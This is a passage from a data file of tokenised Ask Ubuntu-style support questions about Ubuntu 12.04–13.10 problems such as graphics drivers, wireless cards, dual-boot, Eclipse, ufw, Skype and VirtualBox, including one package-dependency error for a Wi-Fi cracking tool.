device boot start end blocks id system /dev/sda1 2048 616447 307200 de dell utility /dev/sda2 616448 6907903 3145728 c w95 fat32 ( lba ) /dev/sda3 * 6907904 960507903 476800000 83 linux /dev/sda4 960509950 976771071 8130561 5 extended partition 4 does not start on physical sector boundary . /dev/sda5 960509952 976771071 8130560 82 linux swap / solaris thank you .
399605	perl module not loading up for ocs inventory setup	i 'm trying to setup the ocs inventory tool in my network . i ca n't set up the initial configuration . check my below ocs_server_setup.log : root @ ubuntu : /usr/src/ocsng_unix_server-2.0 # vim ocs_server_setup.log found apache server_config_file apache2.conf found apache main configuration file /etc/apache2/apache2.conf using apache main configuration file /etc/apache2/apache2.conf checking for apache user account found apache user account www-data using apache user account www-data checking for apache group found apache user group www-data using apache user group www-data checking for apache include configuration directory redhat compliant apache include configuration directory conf.d/ found apache include configuration directory /etc/apache2/conf.d/ using apache include configuration directory /etc/apache2/conf.d/ checking for perl interpreter found perl intrepreter at < /usr/bin/perl > using perl intrepreter /usr/bin/perl ============================================================ installing communication server ============================================================ checking for make utility make utility not found unable to build ocs inventory ng perl module ! do you wish to setup communication server on this computer ( [ y ] /n ) ? + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | checking for make utility ... | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + make utility not found ! setup is not able to build ocs inventory ng perl module .
399609	does ubuntu 13.10 run well on alienware 14 laptops ?	does ubuntu 13.10 run well on alienware 14 laptops ? my specs are : - processor : 4th generation intel core i7-4700mq processor ( 6m cache , up to 3.4ghz ) - memory : 8gb ddr3l at 1600 mhz ( 2 x 4g ) - hard drive : 750gb 7200rpm sata 6gb/s - video card : nvidia geforce gt 750m with 16b gddr5 . thank you for your help !
399610	how do i put my password in to terminal ?	how do i figure out/input my password into terminal ? i just started using ubuntu , and i want to get netflix on it . when i put in the command line for that , it asks for my password , but i am unable to enter it . what can i do to enter it ?
399618	getting classnotfoundexception while launching the eclipse	getting error : java.lang.classnotfoundexception : org.eclipse.core.runtime.adaptor.eclipsestarter at java.net.urlclassloader $ 1.run ( urlclassloader.java:366 ) at java.net.urlclassloader $ 1.run ( urlclassloader.java:355 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:354 ) at java.lang.classloader.loadclass ( classloader.java:425 ) at java.lang.classloader.loadclass ( classloader.java:358 ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:626 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:584 ) at org.eclipse.equinox.launcher.main.run ( main.java:1438 ) while launching eclipse in ubuntu 13.10 . i have installed the eclipse using command : sudo apt-get install eclipse eclipse-jdt eclipse-pde openjdk-7-jre eclipse-platform junit junit4 libhamcrest-java libasm3-java openjdk-7-jre-headless please help : how can i install eclipse java ee in ubuntu
399621	my wireless card is not working properly	i am using ubuntu for a short time now , and my network card is giving me a headache . i 'm dual booting , i have ubuntu 13.10 and windows 8.1 , both x64 . the thing is , my wireless card ( realtek rtl8188cu wireless lan 802.11n usb 2.0 network adapter ) works flawlessly on windows ( could be a driver issue ) . while using windows , the green led on the card flashes , and while using ubuntu , it 's always on ( that 's not the problem , but i thought it might be worth mentioning ) ... the problem is in the range . my home network is not listed ( sorry for the following , been with windows for a long time ) anywhere in control panel ( network and bla bla , ca n't remember how it 's called ) . on windows the signal strength is at max . if i 'm lucky , my home network will appear in ubuntu , but if i try to connect , i will be asked for the network key every 10 seconds and nothing else will happen . ( btw , this terminal of yours is confusing . command prompt is , how should i say this , more noob friendly ! )
399622	logitech mk520 with 12.04.3 lts and workspace switching	i 'm having a very specific issue with a new logitech mk520 keyboard on ubuntu 12.04.3 lts . everything works fine except when , in the keyboard layout , i switch the caps lock and ctrl keys . ( i prefer using caps lock as my ctrl key ) then when using ctrl-alt- ( or really capslock-alt- in my case ) to switch workspaces ( 2x2 layout ) i can go down , left and right , but not up . any ideas ? is there any way to check that that ctrl-alt-up key sequence is getting from the keyboard to the os correctly ? fyi , the ctrl-alt-up works fine when i do n't switch the caps/ctrl keys . it also works fine using the switched caps/ctrl on a microsoft 800 wireless keyboard . i 'd really like to use the logitech though with the switched caps/ctrl setup . thanks .
399624	ubuntu server 12.04 and ufw failure on startup , and several module not found errors	i have problem enabling ufw on startup , it works fine if i do : sudo ufw enable . but after restart puf , i 've to redo it . i tried : sudo /lib/ufw/ufw-init stop ; sudo /lib/ufw/ufw-init start and received following errors : warning : deprecated config file /etc/modprobe.conf , all config files belong into /etc/modprobe.d/ . fatal : module nf_conntrack_ftp not found . warning : deprecated config file /etc/modprobe.conf , all config files belong into /etc/modprobe.d/ . fatal : module nf_nat_ftp not found . warning : deprecated config file /etc/modprobe.conf , all config files belong into /etc/modprobe.d/ . fatal : module nf_conntrack_netbios_ns not found . iptables-restore : line 69 failed iptables-restore : line 30 failed ip6tables-restore : line 65 failed problem running '/etc/ufw/before.rules' problem running '/etc/ufw/after.rules' problem running '/etc/ufw/before6.rules' in file /etc/ufw/after.rules problem was commit last line , so i went with trial and error and found original culprit : -a ufw-after-input -m addrtype -- dst-type broadcast -j ufw-skip-to-policy-input uncommented and it was removed from errors . as for the rest i could n't go through all of them as they contain allot of rules ! any ideas how to fix startup problem ?
399627	how to make a bootable windows 8 usb from ubuntu 13.10 ? ( solved )	i have been trying to create a bootable usb for windows 8.1 on my asus notebook . i have tried many things like formatting it to ntfs and copying the contents of the iso into the drive , but the option to boot it does not show up in the boot screen as it did when i installed ubuntu . i have also tried `` winusb '' and unetbooting does not load up for whatever reason . edit : ill reword this . i am using ubuntu to create a bootable usb to install windows 8 on my machine . but it does not detect the usb when i try to boot form it on the boot screen but when i istalled ubuntu it showed up . i want to install windows 8 then after that i will install ubuntu 14.04 along with it when it comes out the model of notebook is asus k55vm and shipped with widows 8 fixed : i had to format the usb to fat32 and not ntfs
399628	dell latitude d630 ubuntu 12.10 graphics problem	when i boot up it makes it to the login screen . after i login , the screen goes crazy and eventually goes black . i tried using the proprietary nvidia drivers with the same outcome . i removed the proprietary nvidia drivers and still got the same outcome . is there any way to to tell if it 's a graphics card problem or if it 's the nvidia drivers .
399629	ubuntu 13.10 wired connection problem by changing router	i recently change my i.s.p and also i change my router . when i did this i ca n't have a wired connection on network but i can connect wireless . any suggestions ?
399634	how to insatll eclipse on ubuntu13.10	hi i want to install the eclipse from scratch , please let me know how can i do this , in case if i have previous eclipse installed how can i remove it completely from the ubuntu 13.10
399637	can not boot windows after installing ubuntu 12.04 on windows 8 machine	i attempted ubuntu 64 bit installation on a windows 8 machine , using a separate parition for ubuntu . new ubuntu installation works fine , but there is no option to boot windows 8 now , though i could see the windows drive & windows folder through ubuntu . i installed ubuntu using the 3rd ( last ) option besides 'install alongside windows ' , 'compelete erase & install ' options among installation types . right now , there is no option to choose the os while starting system . i tried doing sudo update-grub2 from terminal but no effect . then also tried fixing boot repair using boot repair utility but it still does n't work . here is the logs from boot repair .
399638	installed updates , now unity / compiz wont load	i just allowed ubuntu ( 13.10 ) to update after being away from work since december . now when i boot i get the normal login screen ( everything looks fine here ) but as soon as i log in i have no window borders , no sidebar or task bar . whenever i try to restart unity or compiz i see this craigb @ mybox : ~ $ unity compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : opengl compiz ( core ) - info : starting plugin : opengl llvm error : program used external function '__morestack ' which could not be resolved ! willing to run extra diagnostics , just tell me what to type hehe .
399639	my gui do n't load after recent update	after a recent update ( regular automatic system updates only ) - probably affecting the nvidia driver - i ca n't open the gui any more ( either on system startup or by manually calling startx ) . this is what happens when i try startx : nvidia : api mismatch : the nvidia kernel module has version 304.88 , but this nvidia driver component has version 304.108 . please make sure that the kernel module and all nvidia driver components have the same version . fatal server error : no screens found i 'm running ubuntu 12.04.3 lts . i have tried several things , including : re-installing nvidia-current running nvidia-xconfig installing the experimental driver ( installed automatically while i tried apt-get purge nvidia-current nvidia-current-updates ) installing drivers from xorg-edgers but got the exact same message in every case . in the end , i managed to `` kinda '' restore things to how they were ( installing nvidia-current and removing unnecessary packages ) and after selecting `` previous linux versions '' on grub i got the gui working on the last stable version . what should i do from now ? stop updating my system and stick to the working version ? try to upgrade my nvidia driver somehow ? wait until a later update fixes things ? i have zero experience with drivers on linux and would really appreciate if someone at least helped me understand what is happening ...
399641	how do i install lubuntu without a cd or usb in ubuntu 12.04 ?	i was given an old coby netbook with win xp and decided to wipe it out and install lubuntu . went through a round of tries with wubi and unetbootin and was n't successful . however , i was successful in getting ubuntu installed on the netbook . now i 'm curious if i can install lubuntu on the system with ubuntu installed ? the netbook does not have a cdrom drive nor can it boot from a usb stick . i do have a working internet conection on the netbook . i do n't want to dual boot both . i just want lubuntu on the netbook . any thoughts or ideas ?
399643	cifs mount through fstab not mounting at boot	i have a cifs share on my nas that i want to have mounted at boot - it 's used by my mythtv server as the main media store . i added an entry into fstab to have it mount but it does n't . it appears that , after looking through my system logs , fstab is being read before my network interfaces are coming online . is there any edit i can make to the fstab entry that would alter this ? the fstab entry for mounting the share is : \\192.168.0.26\mythtv\media /media/mybooklive cifs username=user , password=pass , umask=002 , uid=136 , gid=144 , iocharset=utf8 0 0 it mounts fine after boot when i issue sudo mount -a and there are no other issues with it . thanks !
399644	wacom on ubuntu 13.04	i have a problem with my wacom tablet ( intuos 5 ) on ubuntu 13.04 . i ca n't give another function for ring . ! [ screenshot ] [ 1 ] when i scroll my ring by clockwise way - i switch modes . it means that i actually ca n't use ring . = ( i tried to change it in wacom tablet settings - but it unable to change function or turn off . i do n't have this trouble on my previous ubuntu version . how i can fix it on 13.04 ? thanks !
399645	error with ( fern-wifi-cracker )	when i enter the command sudo dpkg -i fern-wifi-cracker_1.6_all.deb this error come up mohamed @ mohamed-k55a : ~/downloads/aircrack-ng-1.2-beta2 $ cd /home/mohamed/desktop mohamed @ mohamed-k55a : ~/desktop $ sudo dpkg -i fern-wifi-cracker_1.6_all.deb selecting previously unselected package fern-wifi-cracker . ( reading database ... 211283 files and directories currently installed . ) unpacking fern-wifi-cracker ( from fern-wifi-cracker_1.6_all.deb ) ... dpkg : dependency problems prevent configuration of fern-wifi-cracker : fern-wifi-cracker depends on aircrack-ng ; however : package aircrack-ng is not installed . fern-wifi-cracker depends on python-scapy ( > = 2.0 ) ; however : package python-scapy is not installed . dpkg : error processing fern-wifi-cracker ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... errors were encountered while processing : fern-wifi-cracker any solution and when i enter the command sudo apt-get -f install this is come up mohamed @ mohamed-k55a : ~/desktop $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed : fern-wifi-cracker 0 upgraded , 0 newly installed , 1 to remove and 3 not upgraded . 1 not fully installed or removed . after this operation , 3514 kb disk space will be freed . do you want to continue [ y/n ] ? y perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` en_us : en '' , lc_all = ( unset ) , lc_time = `` en_us.utf-8 '' , lc_monetary = `` en_us.utf-8 '' , lc_address = `` en_us.utf-8 '' , lc_telephone = `` en_us.utf-8 '' , lc_name = `` en_us.utf-8 '' , lc_measurement = `` en_us.utf-8 '' , lc_identification = `` en_us.utf-8 '' , lc_numeric = `` en_us.utf-8 '' , lc_paper = `` en_us.utf-8 '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... 215040 files and directories currently installed . ) removing fern-wifi-cracker ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... and i 'm using ( ubuntu 12.04 lts )
399647	have problem with install latest amd ati drivers	hello i have problem with install ati 13.12 drivers on kubuntu 13.10 . i receive this error in console loading new fglrx-13.251 dkms files ... building only for 3.11.0-15-generic building for architecture x86_64 building initial module for 3.11.0-15-generic error ! bad return status for module build on kernel : 3.11.0-15-generic ( x86_64 ) consult /var/lib/dkms/fglrx/13.251/build/make.log for more information . update-initramfs : deferring update ( trigger activated ) processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot setting up fglrx-amdcccle ( 2:13.251-0ubuntu1 ) ... setting up fglrx-dev ( 2:13.251-0ubuntu1 ) ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.11.0-15-generic ^cdpkg : error processing initramfs-tools ( -- install ) : subprocess installed post-installation script was interrupted processing triggers for libc-bin ... errors were encountered while processing : initramfs-tools this is /var/lib/dkms/fglrx/13.251/build/make.log dkms make.log for fglrx-13.251 for kernel 3.11.0-15-generic ( x86_64 ) пт яну 3 21:04:01 eet 2014 amd kernel module generator version 2.1 doing makefile based build for kernel 2.6.x and higher rm -rf *.c *.h *.o *.ko *.a . ? ? * *.symvers make -c /lib/modules/3.11.0-15-generic/build subdirs=/var/lib/dkms/fglrx/13.251/build/2.6.x modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-15-generic' cc [ m ] /var/lib/dkms/fglrx/13.251/build/2.6.x/firegl_public.o cc [ m ] /var/lib/dkms/fglrx/13.251/build/2.6.x/kcl_acpi.o /var/lib/dkms/fglrx/13.251/build/2.6.x/kcl_acpi.c : in function ‘kcl_acpi_parsetable’ : /var/lib/dkms/fglrx/13.251/build/2.6.x/kcl_acpi.c:999:5 : warning : passing argument 1 of ‘ ( acpi_status ( * ) ( u32 , void * , void * ) ) handler’ makes integer from pointer without a cast [ enabled by default ] ( ( acpi_table_handler ) handler ) ( hdr ) ; ^ /var/lib/dkms/fglrx/13.251/build/2.6.x/kcl_acpi.c:999:5 : note : expected ‘u32’ but argument is of type ‘struct acpi_table_header *’ /var/lib/dkms/fglrx/13.251/build/2.6.x/kcl_acpi.c:999:5 : error : too few arguments to function ‘ ( acpi_status ( * ) ( u32 , void * , void * ) ) handler’ make [ 2 ] : *** [ /var/lib/dkms/fglrx/13.251/build/2.6.x/kcl_acpi.o ] error 1 make [ 1 ] : *** [ _module_/var/lib/dkms/fglrx/13.251/build/2.6.x ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.11.0-15-generic' make : *** [ kmod_build ] error 2 build failed with return value 2 i reinstall pc with format root and home partitions but problem is same . my video is radeon hd5750
399648	unknown failed password logs	i decided to install steam on ubuntu 12.04 from the official repo . however after the installation ( which required me to enter my password a second time in a terminal to install required updates ) i noticed this at the logs : sudo : pam_unix ( sudo : auth ) : conversation failed sudo : pam_unix ( sudo : auth ) : auth could not identify password for [ nick ] sudo : pam_unix ( sudo : auth ) : conversation failed sudo : pam_unix ( sudo : auth ) : auth could not identify password for [ nick ] sudo : pam_unix ( sudo : auth ) : conversation failed sudo : pam_unix ( sudo : auth ) : auth could not identify password for [ nick ] sudo : nick : 3 incorrect password attempts ; tty=pts/1 ; pwd=/home/nick/.local/share/steam ; user=root ; command=validate sudo : unable to execute /usr/sbin/sendmail : no such file or directory sudo : pam_unix ( sudo : auth ) : authentication failure ; logname=nick uid=1000 euid=0 tty=/dev/pts/1 ruser=nick rhost= user=nick ( that was me typed in wrong accidentally ) sudo : nick : tty=pts/1 ; pwd=/home/nick/.local/share/steam ; user=root ; command=/usr/bin/apt-get update sudo : pam_unix ( sudo : session ) : session opened for user root by nick ( uid=1000 ) sudo : pam_unix ( sudo : session ) : session closed for user root sudo : nick : tty=pts/1 ; pwd=/home/nick/.local/share/steam ; user=root ; command=/usr/bin/apt-get install libgl1-mesa-dri-lts-raring : i386 libgl1-mesa-glx-lts-raring : i386 libc6 : i386 sudo : pam_unix ( sudo : session ) : session opened for user root by nick ( uid=1000 ) sudo : pam_unix ( sudo : session ) : session closed for user root what could be the cause of these 3 failed password attempts ? i installed steam on both of my computers and the same thing happened on both so im 99 % sure thats the cause
399649	problem with : `` mon0 is on channel -1 , but the ap uses channel 1 ''	i have this very famous problem , and i cant find the soulution . of course i searched a lot on but i cant fix it . please be clear with your answers i 'm not an ubuntu expert . ( been using it for 3-4 months only ) . thanks !
399651	ca n't select postgresql in libre base	after freshly installing ubuntu 13.10 ( 64 bit ) and libre base 4.1 ( using the software center ) the selector for postgresql databases is missing . ca n't figure out what might be missing . i installed all extensions that are listed in the software center .
399656	after using the terminal , wireless connection is gone	yesterday i was looking online to see how can i transfer pictures , files from my nexus 7 tablet to my desktop computer with the usb cable.. i 've found several support forums like this one i 'm using right now , someone has already asked a question like mine so i followed the best answer , i typed the commands in the terminal as the helper suggested , then i restarted my desktop pc , after that it did n't connect any more , it connects wireless usually , but since yesterday no connection : ( i still have the page/link that shows the answer i 've followed ( the top one ) : how do i connect a nexus 7 to transfer files ? i 'm also copying an pasting the answer i 've followed : ''you have to follow a below procedure to share contents between ubuntu to nexus 7 . install the necessary tools using terminal . sudo apt-get install mtp-tools mtpfs connect your galaxy nexus to your computer . on your phone , open up the notification drawer , and click on “usb connection type” . make sure that mtp is selected . type these commands in terminal : mtp-detect | grep idvendor mtp-detect | grep idproduct the output of these commands should give you idvendor and idproduct . note down the values given , as you 'll need them later . run this command in terminal : gksu gedit /etc/udev/rules.d/51-android.rules a gedit window should open . simply copy and paste below line . subsystem== '' usb '' , attr { idvendor } == '' vendorid '' , attr { idproduct } == '' productid '' , mode= '' 0666 '' replace vendorid and productid with the idvendor and idproduct you had noted down earlier in gedit . save and close the file . then , disconnect your phone and run these commands : sudo service udev restart sudo mkdir /media/galaxynexus sudo chmod a+rwx /media/galaxynexus sudo adduser yourusername fuse replace yourusername with your ubuntu user name . now , run this command : gksu gedit /etc/fuse.conf in the gedit window , remove the # at the beginning of the last line . you’re almost done ! now , restart your computer , and then run these three commands : echo `` alias android-connect=\ '' mtpfs -o allow_other /media/galaxynexus\ '' '' > > ~/.bashrc echo `` alias android-disconnect=\ '' fusermount -u /media/galaxynexus\ '' '' > > ~/.bashrc source ~/.bashrc again , do re-type the quotes in each command after you’ve copied , otherwise the command won’t work . connect your phone again , and then make sure your phone is using mtp , then run this command : android-connect you will able to connect the nexus 7 your to your ubuntu computer . '' after i did this and restarted my pc , i could n't connect any more with wireless
399658	ubuntu 13.10 and 12.04 ask for password when unlocking	i have ubuntu 13.10 and 12.04 installed on 2 pc , in both ones i do n't want ubuntu to ask for password when unlocking session , i disabled it from options but it 's still asking for it , it does n't when booting , but it does when unlocking , how can i do it ? in the locking settings it says `` ask for passowrd every time coming back from suspension '' , i disabled it but it 's still asking.thanks .
399659	update to current version of o.s	i just installed ubuntu 10.4 and now i read that it 's no longer supported . i 'm running windows xp on a laptop 32bit as a dual boot with ubuntu . i want to update to a more current version of ubuntu . how can i do that ?
399665	how do i switch desktop session users from a shell script ?	i 've got 2 users , foo and bar . currently if i 'm logged in as foo , i can select bar from the menu in the top-right of unity , and since bar has no password set , i switch straight to bar . however , i want to have this same result when i run a shell script , rather than having to use the menu . what do i need to put in the shell script to trigger the user switch ?
399667	ubuntu 13.10 virtualbox error kernel driver not installed ( rc=-1908 )	i have been trying for a few hours to get virtual box running in ubuntu 13.10 every time i try to run a virtual machine running 64 bit arch linux i get an error message that says : kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary when i do what the error prompt tells me , i get another error saying that the directory does n't exist . i have done research on the forums , and i have found nothing that works . it may be use full to know that i have virtual box installed from the ubuntu software center , and not from virtualbox.org because whenever i try to run the .deb file downloaded from there , ubuntu software center does n't let me use it for some reason . any help would be greatly appreciated ! thanks , j
399672	network yes , internet no	i have seen some questions similar to mine but not the same . i have just gone through the process of installing 12.04 dual boot with windows 8 . before i resolved all my boot issues and ran ubuntu i could connect to the internet no problem . now i can connect to my router and ping is ok , but no applications can reach the internet . pinging google fails . on a similar user question someone suggested pinging 173.194.40.51 that does work . i think this went bad for me when a large number of updates were installed .
399680	network failing after rx errors	i am running 12.04.3 . after a period ( several hours to a couple of days ) the network stops working . i can find nothing in any logs and my router is not recording errors , but i am getting rx errors from ifconfig . i have changed my ethernet cable and router port to no avail . there are no rx errors before the network failure . any ideas ? eth2 link encap : ethernet hwaddr 00:25:22 : a1:86:51 inet addr:192.168.1.113 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :225:22ff : fea1:8651/64 scope : link up broadcast running multicast mtu:1500 metric:1 **rx packets:151833 errors:0 dropped:6247 overruns:6153 frame:6153** tx packets:181935 errors:0 dropped:0 overruns:0 carrier:5 collisions:0 txqueuelen:1000 rx bytes:18121495 ( 18.1 mb ) tx bytes:227958495 ( 227.9 mb ) interrupt:42
399683	installing ubuntu 12.04 / 13.10 on g505 laptop with amd a4-5000	i 've tried 6 different distros and i ca n't find anything that 's stable with the g505 with amd 's a4-5000 kabini processor . in bois i have disabled secure boot , set os to other , enabled svm but left uefi enabled . ubuntu 13.10 throws hwdb not found errors but seems to boot , then goes the screen goes black and only indication that anything is happening is the power button any help at all would be greatly appreciated , i 've been trying to get some form of distro installed on this win8 machine for 2 days now . the closest i 've gotten is fedora 20 boots to live usb but freezes after a minute or so .
399685	rendering problem on multiple browsers	toshiba satellite p870 ( has multiple compatibility issues already , including touchpad not working and no control for keyboard backlight . i believe many of the problems may have to do with the bios , since this was a windows 8 machine and problems persisted even on windows 7 ) . on ubuntu 12.04 , as you can see on the screenshots provided below , at random times , when i scroll down or up , the image and placement of objects on the webpage will go crazy . and when a new window opens , almost everything in the webpage will go black , sometimes fixing itself if i scroll very fast up or down . this started recently . it started in chromium . thinking it was the browser , i uninstalled it and installed regular chrome from google . but about 3 days later it started to occur in chrome as well , so i just simply started using firefox on anything non-google-related , and firefox was working fine . yet a week and a half later , firefox started having the same problem . now , i downloaded opera to test it out , see if the problem would show up there too , and it did . not only that , but on chrome/chromium , at random times as well , if i make a video fullscreen , then exit out using either the esc key or the digital one ( happens more with esc though , the video will keep playing , but the screen will go entirely solid gray , and my laptop becomes completely unresponsive to any keyboard commands , forcing me to do a hard reset . so seeing how this is happening in multiple browsers , i 'm guessing it 's my laptop , but have no clue what it could be as every other program does not have this issue . i think it might also be related to the issue of my splash screen asking for my login password not appearing sometimes . ( i have more screenshots of other issues as well . )
399688	sandbox way for linux	i wonder if there is a kind of a sandboxing solution for linux : when i want to try a software without installing it i get all the .deb files and extract then somewhere , then i do two things : export path= '' $ path : /home/user/testing_app/bin '' export ld_library_path= '' $ ld_library_path : /home/user/testing_app/lib '' most of the times it works well , but sometimes the applications require /etc configurations , or other resources ( like images on share folder ) that i was not able to solve . i know the chroot with mount -o bind would provide me a separated environment , but i still need to bind /bin and /etc directories to use others dependencies . well , i was wondering if you know any solution , such a way to bind two directories mixing their content and recording the new/edited content only in one of them . edit : from wikipedia : `` in computer security , a sandbox is a security mechanism for separating running programs . it is often used to execute untested code , or untrusted programs from unverified third-parties , suppliers , untrusted users and untrusted websites . '' sometimes there is more than one app that is candidate to solve my problems , in that case i want to get the one which better fit my needs , so i install all of them , but i just want to try them , i want to `` restore '' my machine state as it was before the installations , of all changes the software did . just removing them is not enough , it is because them generate dot files in my home , or generate logs files , or change other software 's settings , i want to have register of all the changes the app do when it runs , and undo them . yes , a vm would solve my problem but besides taking a large space to hold two or more linux installations , it also lose performance . a separated linux installation in my disk doing chroot would please me better than a vm in performance , but it still takes some unwanted spaces because of repeated files , almost all of them are the same of my original distro . this is what prompted me to open this topic , if somehow i could return to a previous state of my entire disk , like a version control system , or like the qemu-img 's backing file `` if a base image is specified with -o backing_file=filename , the image will only record differences between itself and the base image '' . of course this still is n't the best solution , because i wish undo only a specific app changes . the ideal solution would be something like that : $ mkdir dir1 dir2 $ echo `` lipsum '' > dir1/file1 $ echo `` original '' > dir1/file2 $ sudo mount -o bind -some-magic-flag dir1 dir2 $ echo `` changed '' > dir2/file2 $ touch dir2/file3 $ ls -1 dir2 file1 file2 file3 # it 's ok $ ls -1 dir1 file1 file2 # file3 sould not be here ! $ sudo umount dir2 $ ls -1 dir2 file2 file3 # file1 was not changed , but file2 was $ cat dir1/file2 original $ cat dir2/file2 changed this is what i need !
399696	bash : no such file or directory	i 've written a simple c program that uses the gtk+ visual interface ( i can post the code if it 's relevant ) . i can compile it without erros or warnings using : gcc -c s9p2.c pkg-config -- cflags glib-2.0 pkg-config -- cflags gtk+-2.0 where s9p2.c is the program name . however , when i try to run the program i get this : bash : ./s9p2 : no such file or directory i have checked with the ls command and the file is in fact there . i have also tried to install . i have tried googling for a solution , and one that came up was to install the ia32-libs package . i did that , but it did not work . i would appreciate any help . please forgive me if i was not clear . edit : as asked , this is the output of ls -l s9p2* is : -rw-rw-r -- 1 francisco francisco 2492 jan 3 19:11 s9p2.c -rw-rw-r -- 1 francisco francisco 6616 jan 3 21:13 s9p2.o
399697	ca n't install skype ubuntu 13.10	due to recent broken nvidia updates ( 331.20 ) from xorg-edgers , i had to do fresh install of system , and i 'm facing a problem with installing skype . i 'm running 64-bit version of ubuntu 13.10 , and a lot of the ways of installing skype ( from canonical partners and terminal , from official skype website , using software center ) give me the same error about unmet dependencies ( more specifically skype-bin package ) . i remember when installing skype last time , it was just about getting ia32-libs , but right now it seems , that this package is deprecated . i understand that this topic is n't new , but i 've tried literally every solution ( at least until i started to see the same things all the time ) , which i could manage to find on the web , and none of them work . any ideas ? i can provide any additional info about what 's going on , if someone will be interested to help me .
399699	sharing with windows 7	here is the issue ... i have ubuntu 12.04lts my room mates all have windows 7 computers , i am tired of burning cd 's for them ... how do i share my second hdd ( media drive ) , that has all the files that always want copies of with them ... in a way that they can access them from their win7 computers ?
399703	ubuntu 13.10 image on an android tablet	after installing the image using the complete linux app , it switches to terminal mode and displays the `` su : not found '' . it should go to rootlocalhost . is there anything i can do to fix this . i have given permission to the folders for read/write but problem exist . i have loaded different ubuntu 's version including debian , archlinux . problem is the same . help please .
399704	dual boot problem with win 8 and ubuntu 12.04 , variation of other thread	i 'm a new ubuntu user , and i have the same problem as this thread , but i believe the answer is adapted to that questioner 's specific set up . could someone help me adapt it to mine ? here 's the summary of my last run of boot-repair .
399709	install with sudo app-get install does n't work , `` not using locking for read only file /var/lib/dpkg/lock ''	i just installed ubuntu touch on my nexus 7 . unfortunately i ca n't install anything from the terminal app : if i enter : sudo apt-get install yasm -y git make g++ build-essential libminiupnpc-dev i get : w : not using locking for read only lock file /var/lib/dpkg/lock e : unable to write to /var/cache/apt/ e : the package lists or status file could not be parsed or opened . if rebooted the device & googled but was n't successful yet . can anyone help me please ? thanks !
399710	clonezilla se issues	this is my first go-around with clonezilla se . i have it on it 's own , private , network where the server is also serving dhcp to the machines that join the network . server : dell optiplex 790 ( sff ) os : ubuntu 12.04 i am having two issues : 1 ) we have two models of desktops in house ... dell optiplex 790 's ( about 90 % ) and optiplex 7010 's ( about 10 % ) . when booting to nic , both machines obtain ip 's and recognize the drbl server almost instantly ... they boot into drbl where they are presented with boot options ( ubuntu 12.04 | clonezilla se | client os | memtest ) . when i hit to boot into clonezilla , the 7010 's wait a few seconds and then proceed to boot appropriately . the 790 's , on the other hand , do n't do anything for about 5 or 6 minutes before , finally , going into clonezilla . after they get in , they image just fine . i read about the kernel issues , but i just do n't really know what to look for there ... also , the problem pc 's are the same model as the server ... 2 ) we want to use multi-casting for imaging as we are going to have to image about 200 machines in the next few months . when i connect one machine to image , it finishes in about 6 minutes . when two machines connect , it goes up to about 17.5 minutes each . we are using , at this point , a small 5-port netgear ( gigabit ) switch . any help people can provide in these areas would be greatly appreciated . thank you , wes crockett
399711	i can not access completely to desktop after upgrade	i 've got ubuntu 13.10 and accepted the proposed automatic update by the system ( ubuntu base 13.10 ) . after reboot i can only see the wallpaper and icons but i do n't see folders or the bar at the top . it happens the same when i try to login using ubuntu , gnome and cinnamon . the only one working properly is xfce . any idea of how to solve this ? i have just run the software manager and it says that all the software is updated . also disk analyzer and system check say everything is ok. how can i make it work ?
399712	how can i run exe files in wine ?	i ca n't seem to run an exe file in ubuntu 12.04 . i do n't have anything configured , and i 'm a complete novice to wine , so put it in layman terms .
399714	install ubuntu on external disk , mac os	the problem i met is how to install ubuntu in a very tricky enviornment : my computer is a macbook pro ( bought in 2013 ) . my os now is mac os and a windows 7 in bootcamp . since my mac pro only have 256 gb hard disk space , i have to install it in external disk . i buy another usb3.0 portable hard disk , which has 500gb space . so , i want to install ubuntu ( 12.04 ) into this external usb hard disk . please give me some hints how to do it . and give me a way to boot it . ( whatever method to boot ) ( i do n't want to install it on any virtual machine . ) thank you !
